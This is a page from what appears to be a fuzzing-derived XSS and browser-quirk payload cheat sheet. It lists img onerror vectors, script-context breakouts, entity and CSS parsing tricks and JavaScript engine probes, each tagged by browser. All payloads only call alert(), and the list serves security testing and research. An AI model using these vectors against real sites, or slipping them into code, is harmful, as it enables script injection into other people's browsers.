Cheat Sheet

Generated payloads from fuzz test results. Filter by type, category, or browser.

Found 153 vectors with results

({"x\0x0D0x0D
":1337}.x)==1337&&alert(13)
JSXSS ExecutionChromeFirefoxSafari
"x\
"==="x" && alert(10)
JSXSS ExecutionChromeFirefoxSafari
"x\0x0D"==="x" && alert(13)
JSXSS ExecutionChromeFirefoxSafari
"x\
"==="x" && alert(8232)
JSXSS ExecutionChromeFirefoxSafari
"x\
"==="x" && alert(8233)
JSXSS ExecutionChromeFirefoxSafari
<img src=data: onerror="1&gt alert(65279)">
XSSHTML ParsingSafari
<img src=data: onerror="1&gt
 alert(8232)">
XSSHTML ParsingSafari
<img src=data: onerror="1&gt> alert(62)">
XSSHTML ParsingSafari
<img src=data: onerror="1&gt~ alert(126)">
XSSHTML ParsingSafari
<img src=data: onerror="1&gt  alert(12288)">
XSSHTML ParsingSafari
<img src=data: onerror="1&amp-alert(45)">
XSSEntity ParsingSafariChromeFirefox
<img src=data: onerror="1&amp
alert(10)">
XSSEntity ParsingSafariChromeFirefox
<img src=data: onerror="1&amp alert(8201)">
XSSEntity ParsingSafariChromeFirefox
<img src=data: onerror="1&amp alert(8192)">
XSSEntity ParsingSafariChromeFirefox
<img src=data: onerror="1&amp alert(8195)">
XSSEntity ParsingSafariChromeFirefox
<form id="test" action="aaa0x00onsubmit=alert(1)><input/type='submit'>0x0D
XSSDOM BehaviorChrome
<div id="test" style="00⟧onload="alert(1)">hello</div>
XSSCSS ParsingChrome
<div id="test" style='0x00onload="alert(1)">hello</div>
XSSCSS ParsingChromeFirefox
var targets=['"','\'','<','/','>','\\']0x0D
if (targets.includes('0x00'.toUpperCase())) {0x0D
    alert(0+' (normal) (0x00 -> '+"0x00".toUpperCase()+')')0x0D
}0x0D
0x0D
if (targets.includes('0x00'.toLocaleUpperCase())) {0x0D
    alert(0+' (locale) (0x00 -> '+"0x00".toLocaleUpperCase()+')')0x0D
}
JSJavaScript SyntaxChromeFirefox
<div id="test" style="background-image: url(00;width:100%">hello</div>
XSSURL HandlingChrome
<script>0x0D
x = "<!--<script>>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(62)>"></div>
XSSHTML ParsingChromeFirefoxMicrosoft Edge
<script>0x0D
x = "<!--<script0x0C>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(12)>"></div>
XSSHTML ParsingChromeFirefoxMicrosoft Edge
<script>0x0D
x = "<!--<script >"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(32)>"></div>
XSSHTML ParsingChromeFirefoxMicrosoft Edge
<script>0x0D
x = "<!--<script0x0D>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(13)>"></div>
XSSHTML ParsingChromeFirefoxMicrosoft Edge
<script>0x0D
x = "<!--<script/>"0x0D
</script>0x0D
<div title="</script><img src=data: onerror=alert(47)>"></div>
XSSHTML ParsingChromeFirefoxMicrosoft Edge
let img = document.createElement('img');0x0D
img.src = 'data:';0x0D
img.setAttribute('\onerror','alert(92)')0x0D
document.body.append(img);
JSDOM BehaviorChromeFirefoxSafari
new URL("https://x.se/long/..0x09/a").pathname.length > 4 ?  false : alert(9)
JSURL HandlingChromeFirefoxSafari
new URL("https://x.se/long/..#/a").pathname.length > 4 ?  false : alert(35)
JSURL HandlingChromeFirefoxSafari
new URL("https://x.se/long/..//a").pathname.length > 4 ?  false : alert(47)
JSURL HandlingChromeFirefoxSafari
new URL("https://x.se/long/..?/a").pathname.length > 4 ?  false : alert(63)
JSURL HandlingChromeFirefoxSafari
new URL("https://x.se/long/..\/a").pathname.length > 4 ?  false : alert(92)
JSURL HandlingChromeFirefoxSafari
b1 = Math.floor(i / 256);0x0D
b2 = i % 256;0x0D
c = d.decode(new Uint8Array([0x1b, 0x24, 0x40, b1, b2])) 0x0D
if (c.split("").map((c) => c.charCodeAt(0)).some((i) => i < 127)) alert(i)
JSCharacter EncodingChrome
<img src=>{"[alert]"}<img/src/onerror=alert(1)>
Source: work
Author: nu11secur1ty
HTMLHTML ParsingChrome
let chr = String.fromCodePoint(33);0x0D
escape(chr) !== encodeURIComponent(chr) && alert(33)
JSXSS ExecutionChromeFirefoxSafari
let chr = String.fromCodePoint(43);0x0D
escape(chr) !== encodeURIComponent(chr) && alert(43)
JSXSS ExecutionChromeFirefoxSafari
let chr = String.fromCodePoint(47);0x0D
escape(chr) !== encodeURIComponent(chr) && alert(47)
JSXSS ExecutionChromeFirefoxSafari
let chr = String.fromCodePoint(64);0x0D
escape(chr) !== encodeURIComponent(chr) && alert(64)
JSXSS ExecutionChromeFirefoxSafari
<script>"\\"-alert(92)//"</script>
XSSCharacter EncodingChromeFirefoxSafari
<<script><notfound></script>
HTMLHTML ParsingFirefox
try {0x0D
    standard_chars = [0x0D
        `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
    ];0x0D
0x0D
    if (!standard_chars.includes(String.fromCodePoint(0))) { 0x0D
        JSON.parse(`{"test":"0x00"}`);0x0D
    }0x0D
} catch {0x0D
    alert(0);0x0D
}0x0D
JSXSS ExecutionChromeSafari
try {0x0D
    standard_chars = [0x0D
        `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
    ];0x0D
0x0D
    if (!standard_chars.includes(String.fromCodePoint(1))) { 0x0D
        JSON.parse(`{"test":"0x01"}`);0x0D
    }0x0D
} catch {0x0D
    alert(1);0x0D
}0x0D
JSXSS ExecutionChromeSafari
try {0x0D
    standard_chars = [0x0D
        `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
    ];0x0D
0x0D
    if (!standard_chars.includes(String.fromCodePoint(2))) { 0x0D
        JSON.parse(`{"test":"0x02"}`);0x0D
    }0x0D
} catch {0x0D
    alert(2);0x0D
}0x0D
JSXSS ExecutionChromeSafari
try {0x0D
    standard_chars = [0x0D
        `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
    ];0x0D
0x0D
    if (!standard_chars.includes(String.fromCodePoint(3))) { 0x0D
        JSON.parse(`{"test":"0x03"}`);0x0D
    }0x0D
} catch {0x0D
    alert(3);0x0D
}0x0D
JSXSS ExecutionChromeSafari
try {0x0D
    standard_chars = [0x0D
        `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
    ];0x0D
0x0D
    if (!standard_chars.includes(String.fromCodePoint(4))) { 0x0D
        JSON.parse(`{"test":"0x04"}`);0x0D
    }0x0D
} catch {0x0D
    alert(4);0x0D
}0x0D
JSXSS ExecutionChromeSafari
let transformedChr = String.fromCodePoint(0).toUpperCase();0x0D
0 > 0x7f &&0x0D
/^\w+$/.test(transformedChr) &&0x0D
alert(0 + '=>' + transformedChr)
JSXSS ExecutionSafariFirefoxChrome

Page 6 of 8